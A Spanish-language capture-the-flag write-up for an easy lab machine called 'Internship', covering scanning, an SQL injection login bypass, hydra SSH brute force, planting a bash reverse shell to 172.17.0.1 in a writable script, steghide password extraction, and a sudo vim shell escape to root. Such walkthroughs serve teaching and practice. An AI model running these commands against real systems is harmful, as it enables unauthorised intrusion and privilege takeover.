Internship

✍️ Autor: s1egfr1ed🔍 Dificultad: Fácil 📅 Fecha de creación: 13/02/2025

🔍 RECONOCIMIENTO

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

ping -c 1 172.17.0.2

para verificar la conectividad de red.

A continuación, realizamos el comando:

nmap -sVC -p- -n --min-rate 5000 172.17.0.2

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Como podemos observar durante el escaneo que el puerto 22 perteneciente al servicio SSH y el puerto 80 perteneciente al servicio HTTP están abiertos por lo que a continuación se indagará más.

🔎 EXPLORACIÓN

Se utiliza el comando:

sudo nmap -sCV -p22,80 -v 172.17.0.2

para obtener más información sobre esos puertos específicamente.

Revisamos el puerto 80.

Viendo el código fuente encontramos un dominio por lo que lo añadimos al /etc/hosts.

Recargamos la página y pulsamos a Iniciar Sesión. Al ser un panel de Login realizamos el típico bypass para probar.

' or 1=1 -- -
' or 1=1 -- -

Vemos que hay unos usuarios por lo que ponemos los nombres en un archivo para realizar fuerza bruta. Nos falta la contraseña por lo que seguimos indagando por lo que escaneamos los directorios.

gobuster dir -u http://172.17.0.2/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

Nos llama la atención de un directorio llamado /spam. A primera vista nos sale vacío pero revisamos el código fuente.

Parece que contiene información relevante pero esta en ROT13.

🚀 EXPLOTACIÓN

Ahora sí tras descubrir la contraseña hacemos fuerza bruta.

hydra -L usuarios -p purpl3 -I ssh://172.17.0.2

Iniciamos sesión con las credenciales.

ssh pedro@172.17.0.2

🔐 PRIVILEGIOS

Al estar dentro y ejecutar:

whoami

aún no somos root, por lo que hacemos:

sudo -l

para ver si hay algo para explotar. No tenemos permisos SUDO.

Dentro del directorio /opt, encontramos el script log_cleaner.sh, el cual pertenece al usuario valentina y tiene permisos de lectura, escritura y ejecución para su propietario, así como permisos de lectura y escritura para otros usuarios.

#!/bin/bash
bash -i >& /dev/tcp/172.17.0.1/445 0>&1

Nos ponemos en escucha.

nc -nlvp 445

Vemos que hay una imagen por lo que nos la traemos a nuestra máquina para realizar la técnica de esteganografía.

mv profile_picture.jpeg /tmp
chmod 0777 /tmp/profile_picture.jpeg

En nuestra máquina local.

scp pedro@172.17.0.2:/tmp/profile_picture.jpeg .

Usamos la herramienta de Steghide.

steghide extract -sf profile_picture.jpeg

Miramos el contenido del archivo.

Será la contraseña de valentina.

vim | GTFOBins

sudo vim -c ':!/bin/sh'

PreviousTproot NextWalking Dead

Last updated 4 months ago

Was this helpful?